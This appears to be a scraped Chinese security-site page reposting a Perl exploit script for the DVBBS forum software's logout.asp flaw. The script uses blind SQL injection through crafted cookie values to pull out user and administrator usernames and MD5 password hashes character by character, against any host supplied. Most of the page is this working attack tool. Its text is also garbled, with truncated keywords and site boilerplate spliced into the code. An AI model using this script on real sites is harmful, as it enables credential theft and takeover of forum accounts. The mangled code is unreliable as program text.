--------------------[获取任意用户MD5加密信息
测试
: #!/usr/bin/perl
#Codz By PsKey<[email protected]>
#Exploit of DVBBS's logout.asp
#--------------------------------------------------------------------------
# 本脚本针对动网论坛logout.asp文件缺陷而写
可以推算出所有用户# MD5加密密码;另外可以自动破解后台管理员ID、username、password
# 脚本参照最新版本编写
若低版本出现不能用情况请自行修改# 脚本利用思路方法:
# 1:在目标论坛以 ilikecat/catlikeme 注册
用户并得到此用户 userid# 2:再另注册
任意用户(此步不可少)# 3:运行脚本
按帮助输入命令参数# 如果是MSSQL版
请把这段糟糕脚本扔到边#--------------------------------------------------------------------------
$|=1;
use Socket;
use Getopt::Std;
getopt('hpwium');
pr
"\n 
=\n";pr
" Exploit of DVBBS's logout.asp\n";pr
" Codz By PsKey<PsKey\@hotmail.com> \n";pr
" http://www.isgrey.com/ && c4st.51.net \n";pr
" Thanx Envymask<130\@21cn.com> \n";pr
" =\n";&usage unless (
d($opt_h) && d($opt_w) && d($opt_i) && d($opt_m));$host=$opt_h;
$port=$opt_p||80;
$path=$opt_w;
$userid=$opt_i;
$user=$opt_u;
$mode=$opt_m;
($opt_m eq "p") {&usage unless
d($opt_u);pr
"\nPlease wait...\n\n";for ($j=1;$j<=16;$j
) {@dic1=(0..9);
@dic2=(a..f);
@dic=(@dic1,@dic2);
&first;
for ($i=0;$i<@dic;$i
) {pr
"$dic[$i]";$key=$pws.$dic[$i];
$target = "ilikecat'%20and%20exists%20(select%20UserID%20from%20[user]%20where%20UserName='$user'%20and%20left(UserPassword,$j)='$key')%20and%20'1'='1";
&second;
("@in" !~ /ilikecat/) {$th=$j.th;
pr
"\n\/\/------------The $th word of the password is $dic[$i]";$pws=$pws.$dic[$i];
last;
}
}
}
pr
"\n\nSuccessful,the full password of $user is $pws.\n";}
els
($opt_m eq "b") { #Crack ID
pr
"\n\#\#\#\#\#\#\#\#\#\#\#Start cracking admin's id...";&first;
for ($i=0;$i<=50;$i
) {$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$i)%20and%20'1'='1";
&second;
("@in" !~ /ilikecat/) {pr
"\n--------->>There is _disibledevent=>
pr " \|\-\>cracking username's length which id is $id[$j] ...";&first;
for ($i=0;$i<=50;$i
) {$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20len(username)=$i%20and%20id=$id[$j])%20and%20'1'='1";
&second;
("@in" !~ /ilikecat/) {pr
"\n--------->>The length of $id[$j] is $i";push (@len,$i);=版权所有 软件Software 下载 学院 版权所有=
&first;
last;
}
}
}
pr
"\n\#\#\#\#\#\#\#\#\#\#\#End Cracking the length of admin's username...\n";sleep(2);
#Crack admin's username
pr
"\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's username...\n";@dic1=(0..9);
@dic2=(a..z);
@dic=(@dic1,@dic2);
for ($j=0;$j<@id;$j
) {$pws="";
pr
" \|\-\>cracking username which id is $id[$j] ...";OUTER: for ($k=1;$k<=$len[$j];$k
) {&first;
USERNAME: for ($i=0;$i<@dic;$i
) {pr
"$dic[$i].";$key=$pws.$dic[$i];
$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(username,$k)='$key')%20and%20'1'='1";
&second;
("@in" !~ /ilikecat/) {$th=$k.th;
pr
"\n--------->>The $th word of $id[$j] username is $dic[$i]";$pws=$pws.$dic[$i];
last USERNAME;
}
($dic[$i] eq "z") {pr
"\ni can't crack this admin's name,maybe it is chinese.\n";push (@user,"\?");
last OUTER;
}
}
}
push (@user,$pws);
pr
"\n>>The username is $pws which id is $id[$j]\n";}
pr
"\n\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's username...\n";sleep(2);
#Crack admin's password
pr
"\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's password...\n";@dic1=(0..9);
@dic2=(a..f);
@dic=(@dic1,@dic2);
for ($j=0;$j<@id;$j
) {$pws="";
pr
" \|\-\>cracking password which id is $id[$j] ...";for ($k=1;$k<=16;$k
) {&first;
PASSWORD: for ($i=0;$i<@dic;$i
) {pr
"$dic[$i].";$key=$pws.$dic[$i];
$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(password,$k)='$key')%20and%20'1'='1";
&second;
("@in" !~ /ilikecat/) {$th=$k.th;
pr
"\n--------->>The $th word of $id[$j] password is $dic[$i]";$pws=$pws.$dic[$i];
last PASSWORD;
}
}
}
push (@pass,$pws);
pr
"\n\n>>The password is $pws which id is $id[$j]\n\n";}
pr
"\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's password...\n\n";pr
"We got them now:\n";pr
f("%-4s %-20s %-16s\n",ID,UserName,PassWord);for ($i=0;$i<@id;$i
) {pr
f("%-4d %-20s %-16s\n",$id[$i],$user[$i],$pass[$i]);}
}
{&usage;
}
sub first {
$str="username=ilikecat&password=catlikeme&CookieDate=1";
$len=length($str);
$req = "GET $path/login.asp?action=chk&username=ilikecat&password=catlikeme HTTP/1.1\n".
"Referer: http://$host$path/login.asp\n".
"Host: $host\n".
"Content-Length: $len\n".
"Cookie: aspsky=usercookies=&userid=&user
=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show;upNum=0\n"."\n".
"$str\n\n";
pr
"\n.";sendraw($req);
$req0 = "GET $path/index.asp HTTP/1.0\n".
"Referer: http://$host$path/index.asp\n".
"Host: $host\n".
"Cookie: aspsky=userid=$userid&usercookies=0&userhidden=2&password=aac9ac496fa5ea8e&user
=%D0%C2%CA%D6%C9%CF%C2%B7&username=ilikecat; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";pr
".\n";sendraw($req0);
}
sub second {
$req1 = "GET $path/logout.asp HTTP/1.0\n".
"Host: $host\n".
"Cookie: aspsky=userid=$userid&usercookies=1&userhidden=2&username=$target; iscookies=0; BoardList=BoardID=Show; \n\n";
pr
".";@res = sendraw($req1);
$req2 = "GET $path/index.asp?action=show HTTP/1.0\n".
"Referer: http://$host$path/index.asp?action=show \n".
"Host: $host\n".
"Cookie: aspsky=usercookies=&userid=&user
=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";pr
".";@in = sendraw($req2);
}
sub usage {
pr
qq~Usage: $0 -h <Host> [-p <port>] -w <path> -i <userid> -m <mode> [-u <user>]
-h =hostname you want to attack
-p =port,80 default
-w =the web path such as "/dvbbs"
-i =the userid of ilikecat
-m =only two choice,b<background> and p<proscenium>(This option need -u)
-u =the user you want to crack
Eg: 1.Crack proscenium
$0 -h http://www.target.com/ -p 80 -w /dvbbs -i 2 -m p -u admin
2.Crack background
$0 -h http://www.target.com/ -p 80 -w /dvbbs -i 2 -m b
~;
exit;
}
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems\n");
(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); (connect(S,pack "SnA4x8",2,$port,$target)){ select(S);
$| = 1;
pr
$req; my @res = <S>;
select(STDOUT);
close(S);
@res;}
{ =版权所有 软件Software 下载 学院 版权所有=die("Can't connect...\n");
}
}
篇文章: 如何编写个简单扫描端口篇文章: 珊瑚虫外挂原理分析
最新评论